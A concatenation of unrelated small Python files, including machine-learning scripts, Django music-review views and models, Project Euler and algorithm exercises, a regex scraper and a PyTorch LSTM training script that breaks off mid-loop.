if print_cost == True and i % 100 == 0:
costs.append(cost)
params = {
"w": w,
"b": b
}
grads = {
"dw": dw,
"db": db
}
return params, grads, costs
def predict(w, b, X):
Y_possibility = sigmoid(np.dot(w.T, X) + b)
Y_predict = np.zeros((1, X.shape[1]))
for i in range(X.shape[1]):
if Y_possibility[0, i] > 0.5:
Y_predict[0, i] = 1
else:
Y_predict[0, i] = 0
return Y_predict, Y_possibility
def training(X_train, Y_train, num_iterations=2000, learning_rate=0.5, print_cost=False):
w, b = initialize_with_zeros(X_train.shape[0])
params, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)
return params, grads, costs
def model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False):
w, b = initialize_with_zeros(X_train.shape[0])
params, grads, costs = optimize(w, b, X_train, Y_train, num_iterations, learning_rate, print_cost)
def loadAndformatSet():
train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()
train_set_x = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T
return train_set_x, classes
if __name__ == '__main__':
train_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()
train_set_x = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T / 255
test_set_x = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T / 255
num_px = train_set_x_orig.shape[1]
params, grads, costs = training(train_set_x, train_set_y, num_iterations=2000, learning_rate=0.009, print_cost=False)
index = 1
plt.imshow(test_set_x[:, index].reshape((num_px, num_px, 3)))
plt.show()
# my_image = "my_image.jpg"
while True:
print("please enter the picture: ")
my_image = input()
fname = "images/" + my_image
image = np.array(plt.imread(fname))
# # , flatten = False
#
my_image = skimage.transform.resize(image, output_shape=(num_px, num_px)).reshape((1, num_px * num_px * 3)).T
# , size = (num_px, num_px)).reshape((1, num_px * num_px * 3)
my_predicted_image, my_predicted_possibility = predict(params["w"], params["b"], my_image)
print("y = " + str(np.squeeze(my_predicted_image)))
print(my_predicted_image.squeeze())
print("is a " + str(classes[int(np.squeeze(my_predicted_image))]))
print("possibility : " + str(my_predicted_possibility))
plt.imshow(image)
im = Image.open(fname)
# im.show()
# im = plt.imread(fname)
# plt.imshow(im)
#
# print("y = " + str(np.squeeze(my_predicted_image)) + ", your algorithm predicts a \"" + classes[
# int(np.squeeze(my_predicted_image)),].decode("utf-8") + "\" picture.")
#
plt.show()
|
import sys
import numpy as np
import pandas as pd
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix, precision_recall_fscore_support
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.ensemble import AdaBoostClassifier, GradientBoostingClassifier
from sklearn.multioutput import MultiOutputClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
# for loading sqllite data
from sqlalchemy import create_engine
#for Export model as a pickle file
import pickle
import nltk
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
nltk.download(['punkt', 'wordnet'])
nltk.download('averaged_perceptron_tagger')
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
def load_data(database_filepath):
"""
Input:
database_filepath: the path of the database
Output:
X : Message features dataframe
Y : target dataframe
category_names : target labels list
This function load the sql data and extract features and target variable
and also target labels list
"""
engine = create_engine('sqlite:///{}'.format(database_filepath))
df = pd.read_sql_table('DisaterResponsefinal', engine)
X = df['message']
Y = df.drop(['id','message','original','genre'],axis=1)
category_names = df.columns[4:]
return X, Y, category_names
pass
def tokenize(text):
"""
Input:
text: the actual message
Output:
clean_tokens : Returns cleaned text for analysis.
This function perform cleaning of Text by using Tokenization and Lemmatization steps.
"""
tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
clean_tokens = []
for tok in tokens:
# lemmatize, normalize case, and remove leading/trailing white space
clean_tok = lemmatizer.lemmatize(tok).lower().strip()
clean_tokens.append(clean_tok)
return clean_tokens
pass
# adding StartingVerbExtractor features besides the TF-IDF
class StartingVerbExtractor(BaseEstimator, TransformerMixin):
"""
It helps to get Parts of Speech Tagging or extracting the starting verb
of sentence. This can be used as an additional features besides the TF-IDF
for modeling.
"""
def starting_verb(self, text):
sentence_list = nltk.sent_tokenize(text)
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
first_word, first_tag = pos_tags[0]
if first_tag in ['VB', 'VBP'] or first_word == 'RT':
return True
return False
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.starting_verb)
return pd.DataFrame(X_tagged)
def build_model():
"""
This function returns Scikit ML Pipeline that process text messages
and apply a classifier.
"""
pipeline = Pipeline([
('features', FeatureUnion([
('text_pipeline', Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer())
])),
('starting_verb', StartingVerbExtractor())
])),
('clf', MultiOutputClassifier(AdaBoostClassifier()))
])
parameters = {
'clf__estimator__n_estimators': [20,50,70],
'clf__estimator__learning_rate': [0.1,0.2,0.5]}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv
pass
def evaluate_model(model, X_test, Y_test, category_names):
"""
Inputs:
model: ML pipelene
X_test: Test features
Y_test: Test labels
category_names: multioutput label names
Output:
results: Returns the the result dataframe with f1 score, precision and recall
for each category
This function helps us to evaluate model performance and report performance
(f1 score, precision and recall) for each category
"""
y_pred = model.predict(X_test)
num = 0
result1 = []
for cat in category_names:
precision, recall, f_score, support = precision_recall_fscore_support(Y_test[cat], y_pred[:,num], average='weighted')
result1.append([cat, float(f_score), float(precision), float(recall)])
num += 1
results = pd.DataFrame(result1, columns=['Category', 'f_score', 'precision', 'recall'])
print('Average f_score:', results['f_score'].mean())
print('Average precision:', results['precision'].mean())
print('Average recall:', results['recall'].mean())
print(results)
return results
pass
def save_model(model, model_filepath):
"""
Inputs:
model : Object either GridSearchCV or Scikit Pipeline
model_filepath: File path to save .pkl file
This function helps to save trained model as Pickle file,
which can be loaded later for analysis
"""
with open(model_filepath, 'wb') as f:
pickle.dump(model, f)
pass
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() |
#!/usr/bin/env python
"""Project Euler - project 1 - Hadoop version (reducer)
If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000."""
import sys
def read_mapper_output(file):
for line in file.readlines():
yield line.strip()
def main():
# input comes from STDIN (standard input)
# expects a set of data to sum
data = read_mapper_output(sys.stdin)
total = 0
for x in data:
total += int(x)
print total
if __name__ == "__main__":
main() |
# Generated by Django 2.2.5 on 2019-12-10 14:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('article', '0004_auto_20191013_2242'),
]
operations = [
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('student_name', models.TextField(verbose_name='Полное имя студента')),
('student_course', models.CharField(max_length=20, verbose_name='Курс студента')),
],
),
migrations.AlterField(
model_name='comment',
name='author_name',
field=models.CharField(max_length=200, verbose_name='имя автора'),
),
]
|
# Testing classes
class AnonymousSurvey():
'''Collects anonymous answers to a survery question'''
def __init__(self, question):
self.question = question
self.responses = []
def show_questions(self):
'''Show survey questions'''
print (self.question)
def store_responses(self, new_response):
'''Store a single response to the survey'''
self.responses.append(new_response)
def show_results(self):
print ("Survey results:")
for response in self.responses:
print("- " + response)
survey = AnonymousSurvey("Where do you live?")
survey.show_questions()
|
from django.conf import settings
def IS_PRODUCTION(request):
return {'IS_PRODUCTION': settings.IS_PRODUCTION} |
from django.db import models
from django.contrib.auth.models import User
class StudySkillsResult(models.Model):
"""
Stores students reponses to study skills assessment.
"""
student = models.ForeignKey(User)
answers = models.TextField()
date_taken = models.DateTimeField(auto_now_add=True)
|
from django.shortcuts import render, redirect
from .models import Song, Songs_list, Artist, Album, Reviews, Album_Reviews, Artist_Reviews, Song_Reviews
from django.db import IntegrityError
from django.contrib import messages
from enum import Enum
from datetime import date
from django.core.mail import send_mail
from django.conf import settings
# TODO disalow empty fields and duplicate songs
ERROR_MESSAGE = 'Uh oh, something went wrong... We\'ll get right on it'
REVIEW_TYPE = {'s': 'Song', 'ar': 'Artist', 'al': 'Album', 'p': 'Playlist'}
def home(request):
return render(request, 'home.html')
def user(request):
lists = Songs_list.objects.filter(user=request.user, name='top 5').order_by('-id')[:5][::-1]
list = []
for e in lists:
print(e.id)
print(type(e))
# print(getattr(e.song,'song_id'))
list.append(
SongObj(Song.objects.filter(id=e.id).first().get_name(),
Song.objects.filter(id=e.id).first().get_artist().get_name()))
return render(request, 'usersongs.html', {'list': list})
def review(request):
if request.method == 'POST':
# review_type: artist, album, song, or playlist
review_type = request.POST['review-type']
print("review type: {0}\nreview type == \'s\': {1}".format(review_type, review_type == REVIEW_TYPE['s']))
review_text = request.POST['review-text']
review_date = date.today()
date_modified = date.today()
# review_score: points added or subtracted to review by community
review_score = 1
# review_rating: reviewer's rating of subject out of 10
review_rating = float(request.POST['rating'])
# review_subj_auth: artist for artist, album, song reviews; user for playlist reviewa
review_subj_auth = request.POST['subj-auth']
# review_subj_container: album (only for song reviews)
review_subj_container = None
if review_type == REVIEW_TYPE['s']:
review_subj_container = request.POST['subj-container']
# review_subj: song or album or playlist (N/A for artist reviews)
review_subj = request.POST['subj']
review_title = request.POST['review-title']
print(review_text)
review_user = request.user
review_base = Reviews.objects.create(
name=review_title,
text=review_text,
date=review_date,
rating=review_rating,
score=review_score,
user=review_user,
date_modified=date_modified
)
review_obj = None
if review_type != REVIEW_TYPE['p']:
if review_type != REVIEW_TYPE['ar']:
# check if artist already exists in db
if Artist.objects.filter(name=review_subj_auth).count() > 0:
artist = Artist.objects.filter(name=review_subj_auth).first()
# if not, add it
else:
artist = Artist.objects.create(
name=review_subj_auth
)
else:
# check if artist already exists in db
if Artist.objects.filter(name=review_subj).count() > 0:
artist = Artist.objects.filter(name=review_subj).first()
# if not, add it
else:
artist = Artist.objects.create(
name=review_subj
)
if review_type == REVIEW_TYPE['al']:
review_base.review_type = 'al'
review_base.save()
# check if album already exists in db
if Album.objects.filter(name=review_subj, artist=artist).count() > 0:
album = Album.objects.filter(name=review_subj, artist=artist).first()
# if not, add it
else:
album = Album.objects.create(
name=review_subj,
artist=artist
)
review_obj = Album_Reviews.objects.create(
review=review_base,
album=album,
)
elif review_type == REVIEW_TYPE['s']:
review_base.review_type = 'so'
review_base.save()
# check if album already exists in db
if Album.objects.filter(name=review_subj_container, artist=artist).count() > 0:
album = Album.objects.filter(name=review_subj_container, artist=artist).first()
# if not, add it
else:
album = Album.objects.create(
name=review_subj_container,
artist=artist
)
# check if song already exists in db
if Song.objects.filter(name=review_subj, album=album, artist=artist).count() > 0:
song = Song.objects.filter(name=review_subj, album=album, artist=artist).first()
# if not, add it
else:
song = Song.objects.create(
name=review_subj,
artist=artist,
album=album
)
review_obj = Song_Reviews.objects.create(
review=review_base,
song=song,
)
else:
review_base.review_type = 'ar'
review_base.save()
review_obj = Artist_Reviews.objects.create(
review=review_base,
artist=artist
)
else:
# TODO implement playlist reviews
pass
review_obj.save()
return redirect('myreviews')
else:
return render(request, 'createreview.html')
def edit_review(request):
if request.method == 'GET' and 'revid' in request.GET:
review_id = request.GET['revid']
review = Reviews.objects.filter(id=review_id).first()
subj = review.name
title = review.name
text = review.text
subj_auth = ''
subj_cont = ''
username = request.user.username
date_p = review.date
date_modified = review.date_modified
rating = review.rating
score = review.score
subject = subj
review_type = review.review_type
if review_type == 'al':
review = Album_Reviews.objects.filter(review_id=review.id).first()
subj = review.album.name
subj_auth = review.album.artist.name
subj_cont = ''
subject = '{0} by {1}'.format(subj, subj_auth)
elif review_type == 'so':
review = Song_Reviews.objects.filter(review_id=review.id).first()
subj = review.song.name
subj_auth = review.song.artist.name
subj_cont = review.song.album.name
subject = '{0} by {1} from the album {2}'.format(subj, subj_auth, subj_cont)
elif review_type == 'ar':
review = Artist_Reviews.objects.filter(review_id=review.id).first()
subj = review.artist.name
subj_cont = ''
subj_auth = ''
subject = subj
'{0} by {1}'.format(subj, subj_auth)
elif review_type == 'pl':
pass
else:
pass
printable = PrintableReview(
review_id=review_id,
subject=subject,
subj=subj,
subj_auth=subj_auth,
title=title,
text=text,
date=date_p,
username=username,
score=score,
rating=rating,
date_modified=date_modified,
subj_cont=subj_cont
)
return render(request, 'editreview.html', {'rev': printable})
if request.method == 'POST':
review_id = request.POST['revid']
title = request.POST['review-title']
text = request.POST['review-text']
rating = request.POST['rating']
review = Reviews.objects.filter(id=review_id).first()
review.name = title
review.text = text
review.date_modified = date.today()
review.rating = rating
review.save()
return redirect('myreviews')
return redirect('review')
def generate_review_list(request, display_type, order_by):
if display_type == 'user':
reviews = Reviews.objects.filter(user=request.user).order_by(order_by)[::-1]
else:
reviews = Reviews.objects.all().order_by(order_by)[::-1]
review_list = []
for r in reviews:
review_id = r.id
# print(r.review_type)
r_type = r.review_type
if r is None:
pass
elif r_type == 'so':
review_temp = Song_Reviews.objects.filter(review=r).first()
song = Song.objects.filter(id=review_temp.song_id).first()
subj = '{0} by {1} from the album {2}'.format(
song.name,
Artist.objects.filter(id=song.artist_id).first().name,
Album.objects.filter(id=song.album_id).first().name,
)
review_list.append(
PrintableReview(
review_id=review_id,
subject=subj,
title=r.name,
rating=r.rating,
score=r.score,
date=r.date,
text=r.text,
subj=song.get_name(),
subj_cont=Album.objects.filter(id=song.get_album().id).name,
subj_auth=Artist.objects.filter(id=song.get_artist().id).name,
username=request.user.username,
date_modified=date.today()
)
)
elif r_type == 'al':
# review_temp = Album_Reviews()
review_temp = Album_Reviews.objects.filter(review=r).first()
# print(review_temp)
# print('this works:', review_temp.get_album().get_name())
album = review_temp.get_album().get_name()
subj = '{0} by {1}'.format(
album,
review_temp.get_album().get_artist().get_name(),
)
review_list.append(
PrintableReview(
review_id=review_id,
subject=subj,
title=r.get_name(),
rating=r.get_rating(),
score=r.get_score(),
date=r.get_date(),
text=r.get_text(),
subj=album,
subj_auth=review_temp.get_album().get_artist().get_name(),
subj_cont='',
username=request.user.username,
date_modified=date.today()
)
)
elif r_type == 'ar':
review_temp = Artist_Reviews.objects.filter(review=r).first()
artist = review_temp.artist.name
# print('=====================================')
# print(artist)
subj = artist
review_list.append(
PrintableReview(
review_id=review_id,
subj=subj,
subj_cont='',
subj_auth='',
subject=subj,
title=r.name,
rating=r.rating,
score=r.score,
date=r.date,
text=r.text,
username=request.user.username,
date_modified=date.today()
)
)
else:
# TODO playlist reviews
# review_list.append(
# Playlist_Reviews.objects.filter(review=r)
# )
pass
# print(len(reviews))
return review_list
def user_reviews(request):
review_list = generate_review_list(request, 'user', 'date')
return render(request, 'userreviews.html', {'list': review_list})
def user_songs(request):
lists = Songs_list.objects.filter(user=request.user, name='top 5').order_by('-id')[:5][::-1]
list = []
for e in lists:
# print(e.id)
# print(type(e))
# print(getattr(e.song,'song_id'))
list.append(
SongObj(Song.objects.filter(id=e.id).first().get_name(),
Song.objects.filter(id=e.id).first().get_artist().get_name()))
return render(request, 'usersongs.html', {'list': list})
def friends(request):
return render(request, 'userfriends.html', {'list': ''})
def topsongs(request):
# TODO This should be generalized for creating any type of list. We don't want duplicate songs in our db
# This checks if request is POST if so gets data, if not redirects
if request.method == 'POST':
print(True)
error = ''
artists = [
request.POST['artist1'],
request.POST['artist2'],
request.POST['artist3'],
request.POST['artist4'],
request.POST['artist5']
]
songnames = [
request.POST['song1'],
request.POST['song2'],
request.POST['song3'],
request.POST['song4'],
request.POST['song5']
]
# TODO get this from spotify
cur_alb = 'TBD'
# TODO generalize this
list = 'top 5'
# adds each artist,song, etc. and checks for duplicates/handles errors
for i in range(len(artists)):
if (artists[i] != '' and artists[i] != None) and (songnames[i] != '' and songnames[i] != None):
cur_art = artists[i]
cur_song = songnames[i]
if Artist.objects.filter(name=cur_art).first() == None:
artist = Artist.objects.create(name=cur_art)
# add
Album.objects.create(name=cur_alb, artist=artist)
if Album.objects.filter(name=cur_alb).count() == 0:
Album.objects.create(name=cur_alb, artist=artist)
else:
artist = Artist.objects.filter(name=cur_art).first()
if Album.objects.filter(name=cur_alb, artist=artist).first() == None:
Album.objects.create(name=cur_alb, artist=artist)
artist = Artist.objects.filter(name=cur_art).first()
album = Album.objects.filter(name=cur_alb, artist=artist).first()
if Song.objects.filter(name=cur_song, album=album, artist=artist).first() == None:
song = Song.objects.create(name=cur_song, album=album, artist=artist)
songs = Songs_list.objects.create(user=request.user, name=list)
songs.song.add(song)
else:
song = Song.objects.filter(name=cur_song, artist=artist, album=album).first()
print(song)
songs = Songs_list.objects.create(user=request.user, name=list)
songs.song.add(song)
# TODO don't add duplicates, and replace if they are on the same list
else:
error =ERROR_MESSAGE
#TODO add input error responses
return redirect('user')
else:
return render(request, 'topsongs.html')
def trending(request):
review_list = generate_review_list(request, 'all', 'score')
return render(request, 'trending.html', {'list': review_list})
def upvote(request):
print(request.method)
if request.method == 'POST':
review_id = request.POST['revid']
review = Reviews.objects.filter(id=review_id).first()
review.score += 1
review.save()
return redirect('trending')
else:
return redirect('trending')
def downvote(request):
print(request.method)
if request.method == 'POST':
review_id = request.POST['revid']
review = Reviews.objects.filter(id=review_id).first()
review.score -= 1
review.save()
return redirect('trending')
else:
return redirect('trending')
def help(request):
# send_email(['schleendevs@gmail.com'], 'help!', 'someone visited the help page')
return render(request, 'help.html')
def handle_errors(ex):
# TODO handle errors, possibly send an email to dev team
pass
class SongObj:
title = str
artist = str
def __init__(self, title, artist):
self.title = title
self.artist = artist
class PrintableReview:
review_id = int
subject = str
title = str
rating = float
score = int
date = str
text = str
username = str
subj = str
subj_auth = str
subj_cont = str
date_modified = str
def __init__(self, review_id, subject, title, rating, score, date, text, username, subj, subj_auth, subj_cont,
date_modified):
self.review_id = review_id
self.subject = subject
self.title = title
self.rating = rating
self.score = score
self.date = date
self.text = text
self.username = username
self.subj = subj
self.subj_auth = subj_auth
self.subj_cont = subj_cont
self.date_modified = date_modified
def send_email(recip, subject, body):
send_mail(
subject,
body,
settings.EMAIL_HOST_USER,
recip,
fail_silently=False
)
|
#!/usr/bin/env python
# coding: utf-8
class lazyproperty:
def __init__(self, func):
self.func = func
def __get__(self, instance, cls):
if instance is None:
return self
else:
value = self.func(instance)
setattr(instance, self.func.__name__, value)
return value
import math
class Circle:
def __init__(self, radius):
self.radius = radius
@lazyproperty
def area(self):
print('Computing area')
return math.pi * self.radius ** 2
@lazyproperty
def perimeter(self):
print('Computing perimeter')
return 2 * math.pi * self.radius
c = Circle(4.0)
c.radius
print(c.area)
c.area
c.perimeter
c.perimeter
c = Circle(4.0)
vars(c)
c.area
c.area
del c.area
vars(c)
c.area
c.area
c.area = 25
c.area
def lazyproperty(func):
name = '_lazy_' + func.__name__
@property
def lazy(self):
if hasattr(self, name):
return getattr(self, name)
else:
value = func(self)
setattr(self, name, value)
return value
return lazy
c = Circle(4.0)
c.area
c.area
c.area
|
from math import *
n = int(raw_input())
pos = list(map(float, raw_input().split()))
sp = list(map(float, raw_input().split()))
mx = max(pos)
mn = min(pos)
def f(p):
ans = 0.0
for x in xrange(n):
ans = max(ans, abs(pos[x] - p)/sp[x])
return ans
def bin():
hi = mx
lo = mn
best = 10000000000.0
for x in xrange(300):
mid =(hi + lo)/2.0
k = f(lo)
q = f(hi)
if(k < q):
hi = mid
best = min(best, k)
else:
lo = mid
best = min(best, q)
return best
print '%.8f' % bin()
|
# to find files in the html string
import re
import requests
url = 'https://www.sina.com.cn'
url = 'https://www.hlgnet.com'
text = requests.get(url).text
# print(text)
re_str = r'src = "(.*?\.jpg)"'
re_str = r'https:.+\.jpg'
re_str = r'[jpg|gif]'
file_name_list = re.findall(re_str, text)
print(file_name_list)
|
class Spam:
num_instances = 0
def __init__(self):
Spam.num_instances = Spam.num_instances + 1
def print_num_instances(self):
print('Number of instances created: %s' % Spam.num_instances)
a = Spam()
b = Spam()
c = Spam()
Spam.print_num_instances(a)
|
Total = int(input('Please enter the amount of cents:'))
print(Total // 200 , "toonies")
Toonies = Total % 200
print(Toonies // 100 , "loonies")
Loonies = Toonies % 100
print(Loonies // 25 , "quarters")
Quarters = Loonies % 25
print(Quarters // 10 , "dimes")
Dimes = Quarters % 10
print(Dimes // 5 , "nickles")
Nickles = Quarters % 5
print(Nickles // 1 , "pennies")
|
from datetime import datetime
import json
class MyLogging:
t = datetime.now()
def __init__(self, path):
self.f = open(str(path) + '/' + self.t.strftime('%d_%m_%y_%H_%M_%S')+'.txt', 'w+')
self.boof = ''
self.path = str(path)
def write_data(self, data):
if self.f.closed:
self.f = open(self.f.name, 'w+')
if self.boof:
data = json.dumps(json.loads(self.boof) + json.loads(data))
self.f.write(data)
self.boof = data
self.close()
def close(self):
self.f.close()
import os
m = MyLogging('.')
m.write_data(json.dumps([{'1': '2'}]))
m.write_data(json.dumps([{'3': '5'}]))
|
import os
from Strava.StravaData import StravaData
# Audrey - 18301580
# Ethan - 22985222
# Amy - 23312763
athletes = [23312763, 18301580, 22985222]
for athlete in athletes:
strava = StravaData(athlete_id=athlete)
print("###################################################")
print(f"Athlete {athlete}")
print()
strava.unzip_gz_files()
# 1122298786 = 1122298786.gpx
# strava.get_activity_data(1122298786)
# 1496404022 = 1611726874.tcx
# strava.get_activity_data(1496404022)
# 3673509552 = 3922240387.fit
# strava.get_activity_data(3673509552)
"""
for id in strava.activities.index:
strava.get_activity_data(id)
"""
for id in strava.activities.index:
file = os.path.join(strava.activity_folder, f"{id}.csv")
if not os.path.exists(file):
strava.get_activity_data(id)
print()
print()
|
def Substring(str1, str2, n, m):
dp = [[0 for k in range(m+1)] for l in range(n+1)]
maxN = 0
for i in range(1, n+1):
for j in range(1, m+1):
if str1[i-1] == str2[j-1]:
dp[i][j] = 1+dp[i-1][j-1]
if maxN < dp[i][j]:
maxN = dp[i][j]
# print(dp)
flag = -1
res = maxN
x = ''
for i in range(n, 0, -1):
for j in range(m, 0, -1):
if dp[i][j] == maxN:
x = x+str2[j-1]
maxN = maxN-1
if maxN < 1:
flag = 1
break
if flag == 1:
break
x = x[::-1] # it got started from the backside !
print("The Common Substring: ", x)
return res
if __name__ == "__main__":
print("\n")
# str1 = 'ABCDGH'
# str2 = 'ACDGHR'
str1 = 'ABC'
str2 = 'AC'
n = len(str1)
m = len(str2)
ans = Substring(str1, str2, n, m)
print("Length of Common Substring: ", ans)
print("\n") |
import unittest
import sys
import os
from pymongo import MongoClient
from bson.objectid import ObjectId
from linguine.transaction import Transaction
class TransactionTest(unittest.TestCase):
def setUp(self):
self.trans = Transaction('test')
self.test_data = {}
def test_parse_json(self):
#set up test data
db = 'linguine-test'
corpora = MongoClient()[db].corpus
test_contents_id = corpora.insert({ "title": "A Tale of Two Cities", "contents" : "it was the best of times it was the worst of times it was the age of whatever it was the age of whatever", "tags": [] })
self.test_data = '{"transaction_id":"1", "operation":"NoOp", "library":"no_library", "corpora_ids":["' + str(test_contents_id) + '"]}'
#clean up
corpora.remove(test_contents_id)
def test_run(self):
#set up test data
db = 'linguine-test'
corpora = MongoClient()[db].corpus
test_contents_id = corpora.insert({"title": "A Tale of Two Cities", "contents" : "it was the best of times it was the worst of times it was the age of whatever it was the age of whatever", "tags": [] })
self.test_data = '{"transaction_id":"1", "operation":"NoOp", "library":"no_library", "corpora_ids":["' + str(test_contents_id) + '"]}'
#execute code
#clean up
corpora.remove(test_contents_id)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 10 16:29:06 2019
@author: aalipour
"""
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 27 20:00:30 2019
@author: aalipour
"""
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 14 21:42:02 2019
@author: aalipour
"""
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import os
import numpy as np
import matplotlib.pyplot as plt
import torch.optim as optim
import time
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision.datasets as dset
class Flatten(torch.nn.Module):
def forward(self, x):
batch_size = x.shape[0]
return x.view(batch_size, -1)
class Network(nn.Module):
def __init__(self):
super(Network,self).__init__()
self.frame=nn.Sequential(nn.Conv2d(in_channels=1,out_channels=6,kernel_size=5),
nn.ReLU(),
nn.MaxPool2d(2,2),
nn.Conv2d(in_channels=6,out_channels=12,kernel_size=5),
nn.MaxPool2d(2,2),
Flatten(),
nn.Linear(in_features=12*4*4, out_features=120),
nn.ReLU(),
nn.Linear(in_features=120, out_features=60),
nn.ReLU(),
nn.Linear(in_features=60, out_features=16),
nn.ReLU())
network=Network()
#pre-train network that has ~50% accuracy
network.frame.load_state_dict(torch.load(os.path.join('E:\\', 'Abolfazl' , '2ndYearproject','code','savedNetworks','orientationClassifier')))
newnet=torch.nn.Sequential(*(list(network.frame.children()))[:-1])
newnet=torch.nn.Sequential(*(list(newnet.children()))[:-1])
import torch
import torch.optim as optim
from echotorch.datasets.NARMADataset import NARMADataset
import echotorch.nn as etnn
import echotorch.utils
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data.dataloader import DataLoader
import numpy as np
import mdp
import matplotlib.pyplot as plt
import torch.nn.functional as F
import pdb
# Parameters
spectral_radius = 0.9
leaky_rate = 0.5
learning_rate = 0.005
firstLayerSize = 5
n_hidden = 200
n_iterations = 20
train_sample_length = 5000
test_sample_length = 1000
n_train_samples = 2
n_test_samples = 1
batch_size = 11
momentum = 0.95
weight_decay = 0
numOfClasses=22
numOfFrames=330
lastLayerSize=60
train_leaky_rate=False
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
import os
import numpy as np
import matplotlib.pyplot as plt
import torch.optim as optim
import time
from torch.autograd import Variable
import torch.nn.functional as F
import torchvision.datasets as dset
from tomDatasetFrameSeriesAllClassesFixedOri import tomImageFolderFrameSeriesAllClasses
transform = transforms.Compose(
[transforms.Grayscale(num_output_channels=1),
transforms.Resize((28,28)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))])
train_set = tomImageFolderFrameSeriesAllClasses(root=os.path.join('E:\\', 'Abolfazl' , '2ndYearproject' , 'datasets','fixedOrirentation' ),transform=transform)
test_set = tomImageFolderFrameSeriesAllClasses(root=os.path.join('E:\\', 'Abolfazl' , '2ndYearproject' , 'datasets','fixedOrirentation' ),transform=transform)
classes=('Ori1','Ori2','Ori3','Ori4','Ori5','Ori6','Ori7','Ori8','Ori9','Ori10','Ori11','Ori12','Ori13','Ori14','Ori15','Ori16''Ori17','Ori18','Ori19','Ori20','Ori21','Ori22')
#classes=('Ori1','Ori2','Ori3','Ori4','Ori5','Ori6','Ori7','Ori8','Ori9','Ori10','Ori11','Ori12','Ori13','Ori14','Ori15','Ori16')
train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size,shuffle=True, num_workers=2)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=batch_size,shuffle=True, num_workers=2)
# Use CUDA?
use_cuda = False
use_cuda = torch.cuda.is_available() if use_cuda else False
# Manual seed
mdp.numx.random.seed(1)
np.random.seed(2)
torch.manual_seed(1)
def param_printer(layer):
for param in layer.parameters():
print(param)
def printIfReqGrad(layer):
for param in layer.parameters():
print(param.requires_grad)
def freeze_layer(layer):
for param in layer.parameters():
param.requires_grad = False
#cortical column
class column(nn.Module):
"""
cortical column model
"""
def __init__(self,preTrainedModel):
super(column,self).__init__()
self.frontEnd=preTrainedModel
self.lstm=torch.nn.LSTM(lastLayerSize,n_hidden,batch_first=True)
self.outLinear=nn.Linear(n_hidden,numOfClasses,bias=True)
def forward(self,x,y=None): #implement the forward pass
hh=np.empty((batch_size,numOfFrames,lastLayerSize))
hh[:]=np.nan
hh=torch.FloatTensor(hh)
# pdb.set_trace()
for batchNum in range(batch_size):
m=x[batchNum,:,:,:].unsqueeze(1)
m = self.frontEnd(m)
hh[batchNum,:,:]=m.detach()
x=hh
# pdb.set_trace()
x, (h_n,c_n)= self.lstm(x)
x= self.outLinear(x)
return x
# end class definition
c1=column(newnet)
if use_cuda:
c1.cuda()
# end if
# Objective function
criterion = nn.CrossEntropyLoss()
# Stochastic Gradient Descent
optimizer = optim.Adam(c1.parameters(),lr=learning_rate)#, lr=learning_rate, momentum=momentum, weight_decay=weight_decay)
#freezing the pretrained front end
freeze_layer(c1.frontEnd)
# For each iteration
for epoch in range(n_iterations):
# Iterate over batches
i=1
for data in train_loader:
# Inputs and outputs
inputs, targets = data
inputs, targets = Variable(inputs), Variable(targets)
if use_cuda: inputs, targets = inputs.cuda(), targets.cuda()
# Gradients to zero
optimizer.zero_grad()
# Forward
# pdb.set_trace()
out = c1(inputs,targets)
# frame=torch.zeros(batch_size,numOfFrames,numOfClasses,device='cuda')
# for batchNum in range(batch_size):
# frame[batchNum,0,targets[batchNum]]=1
##
# targets=frame
# newout=torch.empty((batch_size,numOfClasses,numOfFrames))
# for i in range(4):
# out[i,:,:]=out[i,:,:].t()
# if use_cuda: newout = newout.cuda()
